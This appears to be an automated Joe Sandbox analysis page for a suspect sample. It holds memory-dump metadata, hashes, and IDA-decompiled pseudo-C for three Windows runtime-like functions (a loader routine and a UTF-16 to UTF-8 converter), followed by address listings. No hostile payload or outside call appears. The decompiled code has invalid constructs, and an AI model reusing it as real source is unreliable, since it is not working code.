0x00a9ec09
0x00a9ec00
0x00000000

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 990e49573389d1f8a335b98ace9c1dd6e5c4840bc66f35afdf96696ad82db2b0
Instruction ID: 04944cfbca4f5f0a076399dc3db8f28902cfb4fe344ef846600c501f0bb6f3db
Opcode Fuzzy Hash: 990e49573389d1f8a335b98ace9c1dd6e5c4840bc66f35afdf96696ad82db2b0
Instruction Fuzzy Hash: 71D18532A18781CFDB16CF35D89A7913FF5F752324708869EC4A2875A2DB341926CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0174513A Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0174513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x180d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0175D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01732280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01734620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0175F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								L0172FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x180b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return L0175B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x01745142
0x0174514c
0x01745150
0x01745157
0x01745159
0x0174515e
0x01745165
0x01745169
0x0174516c
0x01745172
0x01745176
0x0174517a
0x0174517a
0x0174517a
0x0174517f
0x01786d8b
0x01786d8e
0x01786d91
0x01786d95
0x01786d98
0x01786d9c
0x01786da0
0x01786da3
0x01786da7
0x01786e26
0x01786e26
0x01786e2a
0x017451f9
0x017451f9
0x017451fe
0x01786e33
0x01786e33
0x01786e39
0x01786e3d
0x01786e46
0x01786e50
0x00000000
0x00000000
0x01786e52
0x01786e53
0x01786e56
0x01786e5d
0x00000000
0x00000000
0x00000000
0x01786e5f
0x01786e67
0x01786e77
0x01786e7f
0x01786e80
0x01786e88
0x01786e90
0x01786e9f
0x01786ea5
0x01786ea9
0x01786eb1
0x01786ebf
0x00000000
0x00000000
0x01786ecf
0x01786ed3
0x00000000
0x00000000
0x01786edb
0x01786ede
0x01786ee1
0x01786ee8
0x01786eeb
0x01786eed
0x01786ef0
0x01786ef4
0x01786ef8
0x01786efc
0x00000000
0x00000000
0x01786f0d
0x01786f11
0x01786f32
0x01786f37
0x01786f3b
0x01786f3e
0x01786f41
0x01786f46
0x00000000
0x00000000
0x01786f4c
0x01786f50
0x01786f50
0x01786f54
0x01786f62
0x01786f65
0x01786f6d
0x01786f7b
0x01786f7b
0x01786f93
0x01786f98
0x01786fa0
0x01786fa6
0x01786fb3
0x01786fb6
0x01786fbf
0x01786fc1
0x01786fd5
0x01786fda
0x01786fda
0x01786fdd
0x01786fe2
0x01786fe7
0x01786feb
0x01786fef
0x01786ff3
0x0174520c
0x0174520c
0x0174520f
0x01745215
0x01745234
0x0174523a
0x0174523a
0x01745244
0x01745245
0x01745246
0x01745251
0x01745251
0x01786f13
0x01786f17
0x01786f17
0x01786f18
0x01786f1b
0x01786f1f
0x01786f23
0x00000000
0x01786f28
0x01745204
0x01745204
0x01745208
0x00000000
0x01745208
0x01745185
0x01745188
0x0174518a
0x0174518e
0x01745195
0x01786db1
0x01786db5
0x01786db9
0x0174519b
0x0174519b
0x0174519e
0x017451a7
0x017451a9
0x017451a9
0x017451b5
0x017451b8
0x017451bb
0x017451be
0x017451c1
0x017451c5
0x017451c9
0x017451cd
0x017451cd
0x017451d8
0x017451dc
0x017451e0
0x01786dcc
0x01786dd0
0x01786dd5
0x01786ddd
0x01786de1
0x01786de1
0x01786de5
0x01786deb
0x01786df1
0x01786df7
0x01786dfd
0x01786e01
0x01786e05
0x01786e09
0x01786e0d
0x01786e11
0x01786e11
0x017451eb
0x01786e1a
0x01786e1f
0x01786e21
0x01786e23
0x00000000
0x017451f1
0x017451f1
0x00000000
0x017451f1

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8d7c375a6cfddfedd23b3f63eddf8eb11903d30c72c4c3a9aaa72b4fc742b5
Instruction ID: eadbc3505ff55a214b91ad796464502660f765bf773bcbd17f78ceae8013bc65
Opcode Fuzzy Hash: 0a8d7c375a6cfddfedd23b3f63eddf8eb11903d30c72c4c3a9aaa72b4fc742b5
Instruction Fuzzy Hash: F6C132B55083819FD354CF28C480A5AFBF1BF88704F144A6EF9998B392D770E985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 017403E2 Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E017403E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x180d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01740548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return L0175B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0172B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1807c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01737D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01737D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01797016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01759830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E017969A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1807c04 != 0) {
						_t118 = _v12;
						_t120 = L0179A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1807bd8;
						if( *0x1807bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E017595D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E017599A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01793540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0171B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0175AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1808474 - 3;
										if( *0x1808474 != 3) {
											 *0x18079dc =  *0x18079dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01737D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01737D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01797016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1808708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1807b00; // 0x0
							asm("ror esi, cl");
							 *0x180b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E017595D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = L01727F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x017403f1
0x017403f7
0x017403f9
0x017403fb
0x017403fd
0x01740400
0x0174040a
0x01784c7a
0x01740537
0x01740547
0x01740410
0x01740410
0x01740414
0x01740417
0x0174041a
0x01740421
0x01740424
0x0174042b
0x0174043b
0x0174043e
0x0174043f
0x0174043f
0x01740446
0x01740449
0x0174044c
0x0174044f
0x01740459
0x01784c8d
0x0174045f
0x0174045f
0x0174045f
0x01740467
0x01784c97
0x01784c9d
0x01784ca4
0x01784caa
0x01784caf
0x01784cb1
0x01784cc3
0x01784cb3
0x01784cbc
0x01784cbc
0x01784cc8
0x01784ccb
0x01784cd7
0x01784cda
0x01784cdf
0x01784cdf
0x01784ccb
0x01784ca4
0x0174046d
0x0174046f
0x0174046f
0x01740471
0x01740476
0x0174047a
0x0174047b
0x01740483
0x01740489
0x0174048d
0x00000000
0x00000000
0x01784ce9
0x01784cef
0x01784d22
0x01784d22
0x00000000
0x01784d22
0x01784cf1
0x01784cf7
0x00000000
0x00000000
0x01784cf9
0x01784cff
0x00000000
0x00000000
0x01784d05
0x01784d07
0x00000000
0x00000000
0x01784d0d
0x01784d0f
0x01784d14
0x01784d16
0x00000000
0x00000000
0x01784d1c
0x01784d1c
0x01740499
0x01740535
0x01740535
0x00000000
0x01740535
0x017404a6
0x01784d2c
0x01784d37
0x01784d39
0x01784d3b
0x00000000
0x00000000
0x01784d41
0x01784d48
0x01740527
0x0174052b
0x0174052d
0x01740530
0x01740530
0x00000000
0x0174052b
0x01784d4e
0x017404ac
0x017404ac
0x017404af
0x017404b2
0x017404b7
0x017404b9
0x017404bb
0x017404bd
0x017404bf
0x017404c5
0x017404c9
0x01784d53
0x01784d59
0x01784db9
0x01784dba
0x01784dbf
0x01784dc2
0x01784dc4
0x01784dc7
0x01784dce
0x00000000
0x01784dce
0x01784d5b
0x01784d61
0x00000000
0x00000000
0x01784d63
0x01784d69
0x00000000
0x00000000
0x01784d6b
0x01784d6e
0x01784d74
0x01784d76
0x01784d7c
0x01784d7e
0x01784d84
0x01784d89
0x01784d8c
0x01784d8d
0x01784d92
0x01784d95
0x01784d96
0x01784d98
0x01784d9a
0x01784d9f
0x01784da4
0x01784da6
0x01784da8
0x01784daf
0x01784db1
0x01784db1
0x01784daf
0x01784da6
0x01784d84
0x01784d7c
0x00000000
0x01784d74
0x017404d6
0x01784de1
0x017404dc
0x017404dc
0x017404dc
0x017404e4
0x01784deb
0x01784df1
0x01784df8
0x01784dfe
0x01784e03
0x01784e05
0x01784e17
0x01784e07
0x01784e10
0x01784e10
0x01784e1c
0x01784e1f
0x01784e35
0x01784e35
0x01784e1f
0x01784df8
0x017404f1
0x017404fa
0x01784e3f
0x01784e47
0x01784e5b
0x01784e61
0x01784e67
0x01784e69
0x01784e71
0x01784e73
0x01740500
0x01740500
0x01740500
0x017404fa
0x01740508
0x0174051d
0x0174051d
0x0174051f
0x01740524
0x00000000
0x01740524
0x01740515
0x01740517
0x01784e7a
0x01784e7c
0x00000000
0x00000000
0x01784e85
0x00000000
0x01784e85
0x00000000
0x01740517

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5f188adff9fb7957fbe086a2cdb728b7c95ba27a2b7198a0d65acb6210e816
Instruction ID: 755758c82846d9f687abe5be20f2f93eb7ee3004855e6036e295cc87bb091407
Opcode Fuzzy Hash: 7a5f188adff9fb7957fbe086a2cdb728b7c95ba27a2b7198a0d65acb6210e816
Instruction Fuzzy Hash: 88911931E4021A9FEB32AB6CC848BADFBA4EB05724F150265FB11A72D1D7B49D40CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0174EBB0 Relevance: .2, Instructions: 250
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E0174EBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E0174ED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}

0x0174ebb8
0x0174ebbf
0x0174ebc1
0x0174ebc6
0x00000000
0x0178b6d6
0x0174ebcd
0x0174ebd2
0x0174ec95
0x0178b6e0
0x0174ec9b
0x0174eca1
0x0174eca1
0x0174ec89
0x00000000
0x0174ec89
0x0174ebd8
0x0174ebdd
0x0178b6ea
0x00000000
0x0174ebe3
0x0174ebe5
0x0174ebe7
0x0174ebef
0x0174ebf2
0x00000000
0x0174ebf5
0x00000000
0x0174ebf5
0x0174ebf5
0x0174ebf7
0x0178b6f6
0x0174ec7c
0x0174ec7c
0x0174ec7f
0x0174ec82
0x0174ec87
0x00000000
0x0174ec87
0x0174ec1a
0x0174ec1a
0x0174ec25
0x0178b725
0x0178b72c
0x0178b72c
0x0174ec2d
0x0174ec31
0x0178b73c
0x0178b744
0x0178b748
0x0178b748
0x0178b749
0x0178b749
0x0178b74a
0x0178b74a
0x0174ec3e
0x0178b860
0x00000000
0x0174ec44
0x0174ec47
0x0178b750
0x0178b758
0x0178b767
0x0178b775
0x0178b77c
0x0178b77f
0x0178b769
0x0178b76c
0x0178b76c
0x0178b781
0x0178b788
0x0178b78b
0x0178b75a
0x0178b75d
0x0178b75d
0x0178b78d
0x0178b792
0x0178b793
0x0178b793
0x0174ec54
0x0174ec56
0x0174ec57
0x0174ec59
0x0174ec5e
0x0174ecaa
0x0174ed16
0x0174ed16
0x0174ecac
0x0174ecaf
